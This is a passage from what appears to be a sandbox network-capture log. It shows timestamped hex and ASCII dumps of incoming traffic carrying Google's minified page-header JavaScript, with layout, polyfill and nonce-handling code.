if(a.ma)a.O\u003d\n!1;else{var c\u003d_.q(_.F(a.o,5),!1),d\u003d_.q(_.F(a.o,7),!1);a.O\u003d!(\"gb_qa\"\u003d\u003d\u003db\u0026\u0026(c\|\|d))}c\u003d\"gb_qa\"\u003d\
2021-12-06 18:08:52 UTC	87	IN	Data Raw: 67 5c 75 30 30 33 64 5f 2e 56 67 28 61 2e 46 29 2e 77 69 64 74 68 3b 66 5c 75 30 30 33 64 4d 61 74 68 2e 6d 61 78 28 66 2c 67 29 3b 5f 2e 4e 67 28 61 2e 47 2c 5c 22 6d 69 6e 2d 77 69 64 74 68 5c 22 2c 66 2b 5c 22 70 78 5c 22 29 3b 5f 2e 4e 67 28 61 2e 46 2c 5c 22 6d 69 6e 2d 77 69 64 74 68 5c 22 2c 66 2b 5c 22 70 78 5c 22 29 7d 63 3f 61 2e 57 7c 7c 28 61 2e 57 5c 75 30 30 33 64 21 30 2c 5a 69 28 61 2c 61 2e 57 29 29 3a 28 61 2e 57 5c 75 30 30 33 64 21 31 2c 61 2e 68 66 28 29 29 3b 6e 75 6c 6c 21 5c 75 30 30 33 64 61 2e 44 5c 75 30 30 32 36 5c 75 30 30 32 36 28 5f 2e 55 28 61 2e 44 2c 5c 22 67 62 5f 45 65 5c 22 2c 21 63 5c 75 30 30 32 36 5c 75 30 30 32 36 21 64 29 2c 5f 2e 55 28 61 2e 44 2c 5c 22 67 62 5f 44 65 5c 22 2c 63 7c 7c 5c 6e 64 29 29 3b 61 2e 6a Data Ascii: g\u003d_.Vg(a.F).width;f\u003dMath.max(f,g);_.Ng(a.G,\"min-width\",f+\"px\");_.Ng(a.F,\"min-width\",f+\"px\")}c?a.W\|\|(a.W\u003d!0,Zi(a,a.W)):(a.W\u003d!1,a.hf());null!\u003da.D\u0026\u0026(_.U(a.D,\"gb_Ee\",!c\u0026\u0026!d),_.U(a.D,\"gb_De\",c\|\|\nd));a.j
2021-12-06 18:08:52 UTC	88	IN	Data Raw: 3b 5f 2e 71 28 5f 2e 46 28 61 2e 6f 2c 37 29 2c 21 31 29 5c 75 30 30 32 36 5c 75 30 30 32 36 28 61 5c 75 30 30 33 64 5f 2e 4d 28 5c 22 67 62 5f 79 65 5c 22 2c 61 2e 44 29 29 5c 75 30 30 32 36 5c 75 30 30 32 36 28 61 5c 75 30 30 33 64 5f 2e 4d 28 5c 22 67 62 5f 68 66 5c 22 2c 61 29 2c 61 2e 6a 5c 75 30 30 33 64 21 30 2c 64 2e 70 75 73 68 28 61 29 29 3b 63 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 6b 62 28 63 2e 63 68 69 6c 64 72 65 6e 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 2e 70 75 73 68 28 65 29 7d 29 3b 72 65 74 75 72 6e 20 64 7d 3b 5c 6e 57 2e 70 72 6f 74 6f 74 79 70 65 2e 79 61 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 77 61 5c 75 30 30 32 36 5c 75 30 30 32 36 74 68 69 73 2e 43 29 7b 76 61 72 20 61 5c 75 30 30 33 64 Data Ascii: ;_.q(_.F(a.o,7),!1)\u0026\u0026(a\u003d_.M(\"gb_ye\",a.D))\u0026\u0026(a\u003d_.M(\"gb_hf\",a),a.j\u003d!0,d.push(a));c\u0026\u0026_.kb(c.children,function(e){d.push(e)});return d};\nW.prototype.ya\u003dfunction(){if(this.wa\u0026\u0026this.C){var a\u003d
2021-12-06 18:08:52 UTC	90	IN	Data Raw: 2e 63 68 69 6c 64 72 65 6e 5b 30 5d 3b 64 3f 66 5c 75 30 30 33 64 67 2e 63 68 69 6c 64 72 65 6e 5b 30 5d 2e 63 68 69 6c 64 72 65 6e 5b 30 5d 2e 73 72 63 3a 62 2e 6a 3f 66 5c 75 30 30 33 64 5c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 6d 61 74 65 72 69 61 6c 2f 73 79 73 74 65 6d 2f 31 78 2f 73 65 61 72 63 68 5f 62 6c 61 63 6b 5f 32 34 64 70 2e 70 6e 67 5c 22 3a 5c 6e 66 5c 75 30 30 33 64 67 2e 73 72 63 3b 61 2e 42 5c 75 30 30 33 64 5f 2e 53 28 5c 22 49 4d 47 5c 22 29 3b 5f 2e 43 65 28 61 2e 42 2c 5b 5c 22 67 62 5f 53 63 5c 22 2c 5c 22 67 62 5f 76 65 5c 22 5d 29 3b 61 2e 42 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 73 72 63 5c 22 2c 66 29 3b 5f 2e 58 68 28 61 2e 42 2c 65 29 3b 61 Data Ascii: .children[0];d?f\u003dg.children[0].children[0].src:b.j?f\u003d\"https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png\":\nf\u003dg.src;a.B\u003d_.S(\"IMG\");_.Ce(a.B,[\"gb_Sc\",\"gb_ve\"]);a.B.setAttribute(\"src\",f);_.Xh(a.B,e);a
2021-12-06 18:08:52 UTC	91	IN	Data Raw: 3b 44 69 28 74 68 69 73 2e 6a 29 3b 43 69 28 74 68 69 73 2e 6a 2c 5c 22 62 61 63 6b 5c 22 29 3b 62 5c 75 30 30 33 64 21 30 3b 62 72 65 61 6b 3b 63 61 73 65 20 5c 22 63 6c 6f 73 65 5c 22 3a 74 68 69 73 2e 53 5c 75 30 30 33 64 21 30 3b 44 69 28 74 68 69 73 2e 6a 29 3b 43 69 28 74 68 69 73 2e 6a 2c 5c 22 63 6c 6f 73 65 5c 22 29 3b 62 5c 75 30 30 33 64 21 30 3b 62 72 65 61 6b 3b 63 61 73 65 20 5c 22 64 65 66 61 75 6c 74 5c 22 3a 74 68 69 73 2e 53 5c 75 30 30 33 64 21 31 3b 62 6a 28 74 68 69 73 2c 74 68 69 73 2e 4c 2e 6a 29 7c 7c 74 68 69 73 2e 41 64 3f 28 74 68 69 73 2e 6a 5c 75 30 30 32 36 5c 75 30 30 32 36 21 74 68 69 73 2e 6a 2e 69 73 56 69 73 69 62 6c 65 28 5c 22 6d 65 6e 75 5c 22 29 5c 75 30 30 32 36 5c 75 30 30 32 36 28 44 69 28 74 68 69 73 2e 6a 29 2c Data Ascii: ;Di(this.j);Ci(this.j,\"back\");b\u003d!0;break;case \"close\":this.S\u003d!0;Di(this.j);Ci(this.j,\"close\");b\u003d!0;break;case \"default\":this.S\u003d!1;bj(this,this.L.j)\|\|this.Ad?(this.j\u0026\u0026!this.j.isVisible(\"menu\")\u0026\u0026(Di(this.j),
2021-12-06 18:08:52 UTC	92	IN	Data Raw: 29 3b 6b 6a 28 61 2c 58 69 28 74 68 69 73 29 29 3b 61 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 5c 75 30 30 33 64 74 68 69 73 2e 0d 0a Data Ascii: );kj(a,Xi(this));a.style.backgroundColor\u003dthis.
2021-12-06 18:08:52 UTC	92	IN	Data Raw: 38 30 30 30 0d 0a 41 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3b 74 68 69 73 2e 6b 61 2e 70 75 73 68 28 61 29 3b 5f 2e 72 68 28 61 2c 74 68 69 73 2e 43 29 3b 74 68 69 73 2e 4e 5c 75 30 30 33 64 61 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 4e 7d 3b 57 2e 70 72 6f 74 6f 74 79 70 65 2e 45 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 5f 2e 73 65 28 74 68 69 73 2e 4e 29 3b 74 68 69 73 2e 4e 5c 75 30 30 33 64 6e 75 6c 6c 3b 65 6a 28 74 68 69 73 29 7d 3b 5f 2e 6c 6a 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 43 3f 61 2e 43 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 3a 61 2e 46 3f 61 2e 46 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 3a 61 2e 50 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 24 5c 22 29 29 7d 3b 57 Data Ascii: 8000A.style.backgroundColor;this.ka.push(a);_.rh(a,this.C);this.N\u003da}return this.N};W.prototype.Ed\u003dfunction(){_.se(this.N);this.N\u003dnull;ej(this)};_.lj\u003dfunction(a,b){a.C?a.C.appendChild(b):a.F?a.F.appendChild(b):a.P.log(Error(\"$\"))};W
2021-12-06 18:08:52 UTC	93	IN	Data Raw: 6f 67 28 45 72 72 6f 72 28 5c 22 61 61 5c 22 29 29 3a 61 2e 24 3f 61 2e 50 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 62 61 5c 22 29 29 3a 61 2e 46 62 5c 75 30 30 33 64 30 5c 75 30 30 33 65 62 3f 30 3a 62 7d 2c 61 6a 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6e 75 6c 6c 21 5c 75 30 30 33 64 61 2e 47 5c 75 30 30 32 36 5c 75 30 30 32 36 28 5c 22 67 62 5f 71 61 5c 22 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2e 4c 2e 6a 3f 5f 2e 4e 67 28 61 2e 47 2c 5c 22 6d 69 6e 2d 77 69 64 74 68 5c 22 2c 5c 22 5c 22 29 3a 6e 75 6c 6c 21 5c 75 30 30 33 64 61 2e 46 62 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 4e 67 28 61 2e 47 2c 5c 22 6d 69 6e 2d 77 69 64 74 68 5c 22 2c 61 2e 46 62 2b 5c 22 70 78 5c 22 29 29 7d 3b 57 2e 70 72 6f 74 6f 74 79 70 65 2e 53 68 5c 75 30 30 Data Ascii: og(Error(\"aa\")):a.$?a.P.log(Error(\"ba\")):a.Fb\u003d0\u003eb?0:b},aj\u003dfunction(a){null!\u003da.G\u0026\u0026(\"gb_qa\"\u003d\u003da.L.j?_.Ng(a.G,\"min-width\",\"\"):null!\u003da.Fb\u0026\u0026_.Ng(a.G,\"min-width\",a.Fb+\"px\"))};W.prototype.Sh\u00
2021-12-06 18:08:52 UTC	95	IN	Data Raw: 65 2e 45 64 3b 57 2e 70 72 6f 74 6f 74 79 70 65 2e 70 68 5c 75 30 30 33 64 57 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 68 3b 57 2e 70 72 6f 74 6f 74 79 70 65 2e 70 69 5c 75 30 30 33 64 57 2e 70 72 6f 74 6f 74 79 70 65 2e 74 61 3b 57 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6a 5c 75 30 30 33 64 57 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 68 3b 57 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6b 5c 75 30 30 33 64 57 2e 70 72 6f 74 6f 74 79 70 65 2e 53 68 3b 57 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6c 5c 75 30 30 33 64 57 2e 70 72 6f 74 6f 74 79 70 65 2e 46 64 3b 57 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6d 5c 75 30 30 33 64 57 2e 70 72 6f 74 6f 74 79 70 65 2e 4d 3b 5c 6e 57 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6e 5c 75 30 30 33 64 57 2e 70 72 6f 74 6f 74 79 70 65 2e 51 62 3b 57 2e 70 72 Data Ascii: e.Ed;W.prototype.ph\u003dW.prototype.zh;W.prototype.pi\u003dW.prototype.ta;W.prototype.pj\u003dW.prototype.lh;W.prototype.pk\u003dW.prototype.Sh;W.prototype.pl\u003dW.prototype.Fd;W.prototype.pm\u003dW.prototype.M;\nW.prototype.pn\u003dW.prototype.Qb;W.pr
2021-12-06 18:08:52 UTC	96	IN	Data Raw: 33 65 4d 61 69 6e 20 6d 65 6e 75 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 22 7d 2c 22 65 6e 64 5f 6f 66 5f 62 6f 64 79 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 69 66 28 5f 2e 71 6a 29 7b 76 61 72 20 75 6a 3b 69 66 28 75 6a 5c 75 30 30 33 64 5f 2e 45 28 5f 2e 71 6a 2e 6f 2c 33 29 29 66 6f 72 28 76 61 72 20 76 6a 5c 75 Data Ascii: 3eMain menu\u003c\/div\u003e\u003c\/div\u003e"},"end_of_body_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u003dthis;\ntry{\nif(_.qj){var uj;if(uj\u003d_.E(_.qj.o,3))for(var vj\u
2021-12-06 18:08:52 UTC	97	IN	Data Raw: 76 6f 69 64 20 30 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 62 3f 76 6f 69 64 20 30 3a 62 2e 63 61 6c 6c 28 63 2c 5c 22 73 63 72 69 70 74 5b 6e 6f 6e 63 65 5d 5c 22 29 3b 28 62 5c 75 30 30 33 64 64 3f 64 2e 6e 6f 6e 63 65 7c 7c 64 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 3a 5c 22 5c 22 29 5c 75 30 30 32 36 5c 75 30 30 32 36 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 2c 62 29 7d 3b 5c 6e 5f 2e 45 6a 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 5c 75 30 30 33 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 5f 2e 44 6a 5c 75 30 30 32 36 5c 75 30 30 32 36 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 44 6a Data Ascii: void 0\u003d\u003d\u003db?void 0:b.call(c,\"script[nonce]\");(b\u003dd?d.nonce\|\|d.getAttribute(\"nonce\")\|\|\"\":\"\")\u0026\u0026a.setAttribute(\"nonce\",b)};\n_.Ej\u003dfunction(a,b){b\u003d\"function\"\u003d\u003dtypeof _.Dj\u0026\u0026b instanceof _.Dj
2021-12-06 18:08:52 UTC	98	IN	Data Raw: 2e 4d 64 28 29 3b 69 66 28 5f 2e 46 28 61 2c 31 38 29 29 4f 6a 28 29 3b 65 6c 73 65 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 45 28 61 2c 31 39 29 7c 7c 30 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 5c 22 6c 6f 61 64 5c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 4f 6a 2c 62 29 7d 29 7d 7d 29 28 29 3b 5c 6e 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 7d 29 28 74 68 69 73 2e 67 62 61 72 5f 29 3b 5c 6e 2f 2f 20 47 6f 6f 67 6c 65 20 49 6e 63 2e 5c 6e 22 7d 2c 22 69 6e 5f 68 65 61 64 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 Data Ascii: .Md();if(_.F(a,18))Oj();else{var b\u003d_.E(a,19)\|\|0;window.addEventListener(\"load\",function(){window.setTimeout(Oj,b)})}})();\n\n}catch(e){_._DumpException(e)}\n})(this.gbar_);\n// Google Inc.\n"},"in_head_script":{"private_do_not_access_or_else_safe_s
2021-12-06 18:08:52 UTC	100	IN	Data Raw: 22 2c 5c 22 30 5c 22 2c 6e 75 6c 6c 2c 31 2c 35 31 38 34 30 30 30 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 5c 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 2c 6e 75 6c 6c 2c 30 2c 30 2c 30 2c 30 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5c 22 35 30 36 31 34 35 31 5c 22 2c 5c 22 67 6f 6f 67 6c 65 5c 5c 5c 5c 2e 28 63 6f 6d 7c 72 75 7c 63 61 7c 62 79 7c 6b 7a 7c 63 6f 6d 5c 5c 5c 5c 2e 6d 78 7c 63 6f 6d 5c 5c 5c 5c 2e 74 72 29 24 5c 22 2c 31 5d 5d 2c 5b 31 2c 31 2c 6e 75 6c 6c 2c 34 30 34 30 30 2c 32 34 33 2c 5c 22 43 48 45 5c 22 2c 5c 22 65 6e 5c 22 2c 5c 22 34 31 32 37 37 37 33 38 Data Ascii: ",\"0\",null,1,5184000,null,null,\"\",null,null,null,null,null,0,null,1,0,0,0,0,0,null,null,0,0,null,0,0,0,0],null,null,null,0,null,null,[\"5061451\",\"google\\\\.(com\|ru\|ca\|by\|kz\|com\\\\.mx\|com\\\\.tr)$\",1]],[1,1,null,40400,243,\"CHE\",\"en\",\"41277738
2021-12-06 18:08:52 UTC	101	IN	Data Raw: 5c 22 2f 77 69 64 67 65 74 2f 61 70 70 2f 73 6f 5c 22 5d 5d 2c 30 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 6f 67 2f 5f 2f 6a 73 2f 6b 5c 75 30 30 33 64 6f 67 2e 71 74 6d 2e 65 6e 5f 55 53 2e 4a 54 77 78 73 67 54 37 41 32 38 2e 4f 2f 72 74 5c 75 30 30 33 64 6a 2f 6d 5c 75 30 30 33 64 71 64 73 68 2f 64 5c 75 30 30 33 64 31 2f 65 64 5c 75 30 30 33 64 31 2f 72 73 5c 75 30 30 33 64 41 41 32 59 72 54 76 65 49 48 70 63 69 77 56 6e 54 51 64 77 52 6a 79 4f 6c 72 32 36 6d 63 6c 47 4e 77 5c 22 5d 2c 5c 22 31 5c 22 2c 5c 22 32 34 33 5c 22 2c 31 2c 30 2c 6e 75 6c 6c 2c 5c 22 65 6e 5c 22 2c 30 2c 6e 75 6c 6c 2c 30 5d 5d 5d 2c 7d 3b 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 Data Ascii: \"/widget/app/so\"]],0,[null,null,null,\"https://www.gstatic.com/og/_/js/k\u003dog.qtm.en_US.JTwxsgT7A28.O/rt\u003dj/m\u003dqdsh/d\u003d1/ed\u003d1/rs\u003dAA2YrTveIHpciwVnTQdwRjyOlr26mclGNw\"],\"1\",\"243\",1,0,null,\"en\",0,null,0]]],};this.gbar_\u003dt
2021-12-06 18:08:52 UTC	102	IN	Data Raw: 5f 2e 6a 61 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 61 28 29 7c 7c 5f 2e 70 28 5c 22 69 50 61 64 5c 22 29 7c 7c 5f 2e 70 28 5c 22 69 50 6f 64 5c 22 29 7d 3b 5f 2e 6c 61 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 30 5c 75 30 30 33 63 5c 75 30 30 33 64 28 30 2c 5f 2e 6b 61 29 28 61 2c 62 29 7d 3b 5c 6e 5f 2e 6d 61 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 30 5c 75 30 30 33 63 62 29 7b 66 6f 72 28 76 61 72 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 2c 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 Data Ascii: _.ja\u003dfunction(){return ia()\|\|_.p(\"iPad\")\|\|_.p(\"iPod\")};_.la\u003dfunction(a,b){return 0\u003c\u003d(0,_.ka)(a,b)};\n_.ma\u003dfunction(a){var b\u003da.length;if(0\u003cb){for(var c\u003dArray(b),d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}retur
2021-12-06 18:08:52 UTC	104	IN	Data Raw: 65 5c 75 30 30 33 64 61 5b 72 61 5d 3a 65 5c 75 30 30 33 64 61 2e 7a 65 3b 62 5c 75 30 30 33 64 28 6e 75 6c 6c 5c 75 30 30 33 64 5c 75 30 30 33 64 65 3f 30 3a 65 29 5c 75 30 30 32 36 31 7d 62 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 73 61 28 63 29 3b 72 65 74 75 72 6e 20 63 7d 65 5c 75 30 30 33 64 7b 7d 3b 66 6f 72 28 63 20 69 6e 20 61 29 65 5b 63 5d 5c 75 30 30 33 64 5f 2e 7a 61 28 61 5b 63 5d 2c 62 29 3b 72 65 74 75 72 6e 20 65 7d 3b 41 61 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 5c 75 30 30 33 64 5f 2e 78 61 28 61 29 3b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 5f 2e 79 61 28 61 2c 41 61 29 3a 61 7d 3b 5f 2e 71 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 Data Ascii: e\u003da[ra]:e\u003da.ze;b\u003d(null\u003d\u003de?0:e)\u00261}b\u0026\u0026_.sa(c);return c}e\u003d{};for(c in a)e[c]\u003d_.za(a[c],b);return e};Aa\u003dfunction(a){a\u003d_.xa(a);return Array.isArray(a)?_.ya(a,Aa):a};_.q\u003dfunction(a,b){return null!
2021-12-06 18:08:52 UTC	105	IN	Data Raw: 6c 5c 75 30 30 32 36 5c 75 30 30 32 36 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 5c 75 30 30 33 64 30 3b 62 5c 75 30 30 33 63 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 61 5b 62 5d 3b 69 66 28 63 5c 75 30 30 32 36 5c 75 30 30 32 36 63 2e 4d 61 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 61 5c 22 29 3b 7d 3b 4a 61 5c 75 30 30 33 64 49 61 28 74 68 69 73 29 3b 4b 61 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 29 61 3a 7b 76 61 72 20 63 5c 75 30 30 33 64 4a 61 3b 61 5c 75 30 30 33 64 61 2e 73 70 6c 69 74 28 5c 22 2e 5c 22 29 3b 66 6f 72 28 76 61 72 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 61 2e 6c 65 Data Ascii: l\u0026\u0026global];for(var b\u003d0;b\u003ca.length;++b){var c\u003da[b];if(c\u0026\u0026c.Math\u003d\u003dMath)return c}throw Error(\"a\");};Ja\u003dIa(this);Ka\u003dfunction(a,b){if(b)a:{var c\u003dJa;a\u003da.split(\".\");for(var d\u003d0;d\u003ca.le
2021-12-06 18:08:52 UTC	106	IN	Data Raw: 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 4c 61 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 5c 75 30 30 33 64 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 3b 5c 6e 5f 2e 4d 61 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5c 22 75 6e 64 65 66 69 6e 65 64 5c 22 21 5c 75 30 30 33 64 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 5c 75 30 30 32 36 5c 75 30 30 32 36 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5c 75 30 30 32 36 5c 75 30 30 32 36 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 72 65 74 75 72 6e 20 62 3f 62 2e 63 61 6c 6c 28 61 Data Ascii: s))}})}return a});La\u003dfunction(a){a\u003d{next:a};a[Symbol.iterator]\u003dfunction(){return this};return a};\n_.Ma\u003dfunction(a){var b\u003d\"undefined\"!\u003dtypeof Symbol\u0026\u0026Symbol.iterator\u0026\u0026a[Symbol.iterator];return b?b.call(a
2021-12-06 18:08:52 UTC	107	IN	Data Raw: 2e 6c 65 6e 67 74 68 2c 66 5c 75 30 30 33 64 62 2e 6c 65 6e 67 74 68 3b 63 5c 75 30 30 33 64 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28 76 61 72 20 67 5c 75 30 30 33 64 30 3b 67 5c 75 30 30 33 63 66 5c 75 30 30 32 36 5c 75 30 30 32 36 63 5c 75 30 30 33 63 65 3b 29 69 66 28 64 5b 63 2b 2b 5d 21 5c 75 30 30 33 64 62 5b 67 2b 2b 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 67 5c 75 30 30 33 65 5c 75 30 30 33 64 66 7d 7d 29 3b 4b 61 28 5c 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6e 64 5c 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 5c 75 30 30 33 64 74 68 69 73 3b 64 Data Ascii: .length,f\u003db.length;c\u003dMath.max(0,Math.min(c\|0,d.length));for(var g\u003d0;g\u003cf\u0026\u0026c\u003ce;)if(d[c++]!\u003db[g++])return!1;return g\u003e\u003df}});Ka(\"Array.prototype.find\",function(a){return a?a:function(b,c){a:{var d\u003dthis;d
2021-12-06 18:08:52 UTC	109	IN	Data Raw: 6c 29 7b 74 68 69 73 2e 6a 5c 75 30 30 33 64 28 67 2b 5c 75 30 30 33 64 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 5c 75 30 30 33 64 5f 2e 4d 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 5c 75 30 30 33 64 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 5c 75 30 30 33 64 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 67 5c 22 29 3b 64 28 6c 29 3b 69 66 28 21 55 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 68 60 5c 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 Data Ascii: l){this.j\u003d(g+\u003dMath.random()+1).toString();if(l){l\u003d_.Ma(l);for(var m;!(m\u003dl.next()).done;)m\u003dm.value,this.set(m[0],m[1])}};k.prototype.set\u003dfunction(l,m){if(!c(l))throw Error(\"g\");d(l);if(!Ua(l,f))throw Error(\"h`\"+l);l[f][thi
